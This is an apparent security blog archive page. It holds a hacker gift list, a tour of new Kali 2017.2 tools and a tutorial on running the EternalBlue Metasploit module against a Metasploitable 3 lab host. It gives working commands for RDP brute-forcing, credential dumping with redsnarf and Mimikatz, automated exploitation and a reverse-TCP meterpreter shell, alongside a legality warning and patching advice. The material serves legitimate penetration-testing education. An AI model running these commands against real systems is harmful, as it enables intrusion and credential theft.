Hacking the Holidays – Security Gift Ideas

•December 4, 2017 • Leave a Comment

Hacking the Holidays hd

It’s that time of the year again when people wonder, “What should I get for the hacker in my life?” So, I thought I would give out a few helpful hints, and throw in some shameless advertising to boot!

Books

Always a great choice, books are very important for the security enthusiast. Not only do they increase our skillset, but also make great places to put your mug, adjust monitor heights, or block a door open.

book marketing

Recommended Security Books:

Hardware

Most hackers love to tinker with hardware. Here are some toys that can be used by the naughty (Red Teamers 😉 ) and the nice.

Raspi Zero Banner

Hardware hacking tools are always a hit. Hak5 and Hacker Arsenal have some great products. Raspberry Pi kits are always fun to tinker with, and you can use them for so many different things. Check out dantheiotman.com for some ideas.

Other Ideas

  • Gift Cards (Amazon, Steam, Playstation, etc – ask to find out what they use)
  • Video Game related swag (Bethesda store is great!)
  • Sci Fi stuff
  • Desk Toys (Who wouldn’t like a Bluetooth toy to try to hack?)
  • Hoodies (stereotypical, I know, but many do like them!)

Sci Fi and video game related posters, shirts, etc. can be a hit. If all else fails, Gift cards are always a good choice if you still can’t decide what the hacker in your life would like.

I hope this helps. Here’s wishing you and yours a Happy Holidays, Merry Christmas, and a wonderful and prosperous New Year!

Advertisements

Kali Linux 2017.2 – New Tools Overview

•September 29, 2017 • Leave a Comment

Kali 2017 new tools

Last week, Kali announced the release of Kali Linux 2017.2! The new version is a collection of all updates and fixes since the last release, but also includes several new tools. In this article we will see what new tools were installed and take a closer look at some of them.

Note: The tools are not installed automatically, but are available from the repositories. So, to use them, you will need to ‘apt-install’ the ones you want.

New tools

  • APT2
  • B374K
  • BloodHound
  • BruteSpray
  • ChangeMe
  • CrackMapExec
  • CredDump7
  • Crowbar
  • Dbeaver
  • hURL
  • Phishery
  • RedSnarf
  • Secure-Socket-Funneling
  • SSH-Audit
  • Tinfoleak
  • Wgetpaste

Let’s take a closer look at some of the tools.

APT2 – An Automated Penetration Testing Toolkit

Website: https://github.com/MooseDojo/apt2

Kali 2017.2 New Tools 1

APT2 performs an NMap scan (or import scans from Nexpose, Nessus, or NMap) and launches enumeration modules and exploits against the target. Options are set in the “default.cfg” file:

Kali 2017.2 New Tools 2

Quick Usage

  • Start Metasploit and run the following command:

load msgrpc User=msf Pass=msfpass ServerPort=55552

Kali 2017.2 New Tools 3

This is needed as when APT2 runs, it it is able to open any remote sessions they will show up in Metasploit.

Then launch APT2 against a target:

apt2 -v -s 1 -b –target 192.168.1.135

The program scans the target, and will automatically begin to attack the target based on the safety level (-s) that you choose.

Any vulnerabilities are listed, and reports are saved to the designated directory:

Kali 2017.2 New Tools 4

A html report file is saved in the “Reports” folder. The “proofs” folder contains a lot of information and results from the scan:

Kali 2017.2 New Tools 5

 

BruteSpray – Service Brute Force tool

Website: https://github.com/x90skysn3k/brutespray

Kali 2017.2 New Tools 6

BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa.

Quick Usage

Run nmap scan and save output, then start Brutespray in interactive mode:

brutespray –file nmap.xml -i

Kali 2017.2 New Tools 7

You can also run it in manual mode by supplying specific information using switches. See the help file or tool website for more information.

Crowbar

Website: https://github.com/galkan/crowbar

Kali 2017.2 New Tools 8

A brute forcing tool that supports OpenVPN, Remote Desktop Protocol, SSH Private Keys and VNC Keys.

Quick Usage

RDP target with known user and password:

crowbar -b -rdp -s 192.168.1.204/32 -u test -c monkey

Kali 2017.2 New Tools 9

Crowbar can be run against a single target or range of targets. It can use individual passwords, password lists and SSH or VNC keys. See tool website for more examples.

Redsnarf

Tool website: https://github.com/nccgroup/redsnarf

Kali 2017.2 New Tools 10

Redsnarf is a pen-testing / red-teaming tool by Ed Williams for retrieving hashes and credentials from Windows workstations, servers and domain controllers

Redsnarf looks like a very useful tool that has a ton of features.  It targets Windows computers and can pull information from the system, recover passwords, enable remote access, run remote shells and much more.

I ran it against a local test Windows 7 desktop system, and it would only run when UAC was totally disabled on the system. So, this seems to be a great post-exploitation tool.

Quick Usage

Information dump with a known admin user name and password:

redsnarf -H ip=192.168.1.93 -u dan -p password

Kali 2017.2 New Tools 11

Information including passwords and shares is displayed and saved to the log directory.

Remote Command shell

Redsnarf has the capability to create several different types of shells.

redsnarf -H ip=192.168.1.93 -u dan -p password -d WIN-42ORBM3SRVF -uD y

Running the command above will connect to the target system and list available shells, as seen below:

Kali 2017.2 New Tools 12

Stealth Mimikatz

The Stealth Mimikatz option is pretty interesting. It creates a webserver on the target system, pulls the system creds and downloads them in plain text:

redsnarf -H ip=192.168.1.93 -u dan -p password -d WIN-42ORBM3SRVF -hR y

Kali 2017.2 New Tools 13

Logging

Whenever you run a command, the program provides you with a directory that contains the program logs. The logs contain a lot of important information gleaned from the system:

Kali 2017.2 New Tools 14

Conclusion

In this article we discussed a few of the new tools included with Kali Linux. Kali Linux is the most feature rich computer security testing platform available and it continues to grow as new tools and capabilities are constantly added.

If you are new to Kali or a seasoned user interested in learning more, check out my “Security Testing with Kali Linux” book series:

Basic Security Testing with Kali Linux

Intermediate Security Testing with Kali Linux

Security Testing with Kali NetHunter

And keep an eye out for the upcoming, “Advanced Security Testing with Kali Linux”.

P4wnP1 the Pi Zero W USB attack Platform

•September 15, 2017 • 1 Comment

The P4wnP1 is an exciting and feature rich USB attack platform that runs on a Raspberry Pi Zero.

featured item

The P4wnP1 turns your Pi Zero/Zero W into a physical security Ethical Hacking pentest tool. In this article, we will cover installing P4wnP1 on a Pi Zero W and using several of its payloads against a target system running Windows 10.

For this article, you will need:

  • Rasberry Pi Zero W (I purchased mine from adafruit.com with a case)
  • Raspberry Pi Power Adapter
  • MicroSD Memory card
  • MicroSD card writer
  • P4wnP1 software

You will also need a target computer to plug the P4wnP1 into (I used a Windows 10 PC) and a secondary computer to SSH into the Pi to control and modify the P4wnP1.

Continue reading article on dantheiotman.com

 

Using the “NSA” EternalBlue exploit on Metasploitable 3

•June 12, 2017 • Leave a Comment

In this tutorial, we will see how to use the “EternalBlue” MS17-010 SMB exploit in Metasploit on Kali Linux to obtain a remote shell in Metasploitable 3, which uses Windows Server 2008.

Introduction

EternalBlue is one of several tools that were allegedly created and used by the NSA. The tools were publicly dumped by a hacker group called “Shadow Brokers” in April. The exploit has been modified and adapted to work as a Metasploit module and has been added to the latest Metasploit version. EternalBlue is a good exploit for Ethical Hackers to try in a test environment as it works very well and returns a System level shell when successful.

Preface

I had to manually update the Metasploit in Kali, as of the time of this writing the EternalBlue exploit was not available in the latest Kali update. Also, there seems to be some issues with the latest Metasploitable 3 install, as several of the service ports that should be open were blocked and it seems some services were not available.

As always, never attempt to access or test a system that you do not have express permission to do so, doing so is illegal and you could end up in jail.

Tutorial

Enough introduction, let’s see the exploit in action!

  • Start the Metasploit framework.
  • In Metasploit, enter “search eternalblue

  • Type, “use exploit/windows/smb/ms17_010_eternalblue

Now you can enter “show options” to see what options are available:

There is not really much you need to do. Just set the target IP (RHOST), and select a payload:

  • set RHOST 192.168.1.127
  • set payload windows/x64/meterpreter/reverse_tcp

You can type “show options” again to see what options need to be set for the payload, but all we need is the Kali IP address (LHOST):

  • set LHOST 192.168.1.3
  • Finally, type “exploit

And we have a shell!

You can type “help” top see all the available Meterpreter commands or just type “shell” for a remote command shell:

And that is it!

Defense

The best mitigation against this attack is to make sure all of your Windows systems are patched and up to date. This exploit has been patched for a while now. It is also a good idea to disable SMB v1, but you must realize the impact that this could have on your network before doing so, and decide if this would be a viable solution for your company.

If you liked this tutorial and want to learn a lot more about Kali, Metasploit and Ethical Hacking, check out my “Basic Security Testing with Kali Linux 2” book.